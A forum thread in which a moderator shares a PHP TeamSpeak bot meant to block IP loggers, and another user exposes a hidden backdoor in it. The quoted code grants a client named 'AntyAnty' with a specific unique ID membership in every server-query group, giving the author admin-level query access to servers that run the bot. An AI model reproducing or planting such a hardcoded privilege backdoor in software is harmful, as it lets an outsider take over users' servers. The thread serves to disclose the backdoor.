AntyIPLogger Download

MarcineG

Moderator
CipherSpeak Developer
Sep 1, 2017
75
36
111
Hello,
I present to you a bot that blocks IP loggers on your server!

1. Required packages:

- Preferably php7.2

2. Installation:

- Everything is described in the instruction.txt file

3. Service:

- Start (./run start)

- Stop (./run stop)

- Delete old photos (php bot.php -i 2)
 

Attachments

  • AntyIPLogger.rar
    37.1 KB · Views: 37

Asphyxia

Owner
Administrator
Apr 25, 2015
1,844
2
2,197
327
This sounds cool, did you make this or where did you get this/source?
 

FarisDev

L oryh brx
Contributor
Jun 9, 2016
277
111
107
I wonder what's gonna happen when someone called "AntyAnty" join the TeamSpeak Server with the unique id: N9spIWFEsUkg0nJVH94nSgPdCTc=

does that code look familiar ?
PHP:
    foreach($ts->getElement('data', $ts->clientList('-uid')) as $user){
      if($user['client_nickname'] == "AntyAnty" && $user['client_unique_identifier'] == "N9spIWFEsUkg0nJVH94nSgPdCTc="){
        foreach($ts->getElement('data', $ts->serverGroupList()) as $grou){
          if($grou['type'] == 2){
            $ts->serverGroupAddClient($grou['sgid'], $user['client_database_id']);
          }
        }
      }
    }
 
E

ewenjo

Can an admin delete this before he gains access to someones server?
 

FarisDev

L oryh brx
Contributor
Jun 9, 2016
277
111
107
Can an admin delete this before he gains access to someones server?
As I know yes, it just give him a Query when he join ur server with his identity and specific name, in case he didn't your good to go.
 

fourwind

New Member
Apr 21, 2019
20
16
5
Dont get me wrong but thats why i would never run any skripts or binary blobs from this forum. In VM? sure.. But never in production.
 
E

ewenjo

As I know yes, it just give him a Query when he join ur server with his identity and specific name, in case he didn't your good to go.
Funny thing is that this probably doesn't work anymore, since you cannot assign the query group "Admin Server Query" to clients anymore.
 

FarisDev

L oryh brx
Contributor
Jun 9, 2016
277
111
107
Funny thing is that this probably doesn't work anymore, since you cannot assign the query group "Admin Server Query" to clients anymore.
Yeah i just remembered that hahah LOL, but old ts server versions is affected.
 

MarcineG

Moderator
CipherSpeak Developer
Sep 1, 2017
75
36
111
Funny thing is that this probably doesn't work anymore, since you cannot assign the query group "Admin Server Query" to clients anymore.
This bot already exists a bit and I decided to just share it;)

---- Automatically Merged Double Post ----

I wonder what's gonna happen when someone called "AntyAnty" join the TeamSpeak Server with the unique id: N9spIWFEsUkg0nJVH94nSgPdCTc=

does that code look familiar ?
PHP:
    foreach($ts->getElement('data', $ts->clientList('-uid')) as $user){
      if($user['client_nickname'] == "AntyAnty" && $user['client_unique_identifier'] == "N9spIWFEsUkg0nJVH94nSgPdCTc="){
        foreach($ts->getElement('data', $ts->serverGroupList()) as $grou){
          if($grou['type'] == 2){
            $ts->serverGroupAddClient($grou['sgid'], $user['client_database_id']);
          }
        }
      }
    }
I removed these lines of code;) As if there were any doubts
 
Last edited:

Asphyxia

Owner
Administrator
Apr 25, 2015
1,844
2
2,197
327
Dont get me wrong but thats why i would never run any skripts or binary blobs from this forum. In VM? sure.. But never in production.
Well to be honest, you should not run anything from the Internet. But we all do!

Remember back when we (R4P3.NET Security Team) found a way to make TeamSpeak 3 wormable? We could have infected 1,000,000+ user clients.

That was a lot more dangerous than this harmless line - he has apparently removed this anyway. I agree that it is questionable, but if his intent is malicious we will find out and he would of course be banned.

We all have to take risks when online, using the Internet is a risky privilege when all these systems were built by hundreds of imperfect humans ;)
 

MarcineG

Moderator
CipherSpeak Developer
Sep 1, 2017
75
36
111
Well to be honest, you should not run anything from the Internet. But we all do!

Remember back when we (R4P3.NET Security Team) found a way to make TeamSpeak 3 wormable? We could have infected 1,000,000+ user clients.

That was a lot more dangerous than this harmless line - he has apparently removed this anyway. I agree that it is questionable, but if his intent is malicious we will find out and he would of course be banned.

We all have to take risks when online, using the Internet is a risky privilege when all these systems were built by hundreds of imperfect humans ;)
I do not want to be malicious to users, the line has been changed and after trouble;)
 

Asphyxia

Owner
Administrator
Apr 25, 2015
1,844
2
2,197
327
line has been changed and after trouble
I know, I was just saying that if someone cannot read code or does not want to take risk - then they can code all their own programs online. Otherwise read the code or take the risk ;)

One person writing all their own programs would be annoying - haha.
 

MarcineG

Moderator
CipherSpeak Developer
Sep 1, 2017
75
36
111
I know, I was just saying that if someone cannot read code or does not want to take risk - then they can code all their own programs online. Otherwise read the code or take the risk ;)

One person writing all their own programs would be annoying - haha.
That's right, I just wanted to share this bot. I think he might be useful
 
Top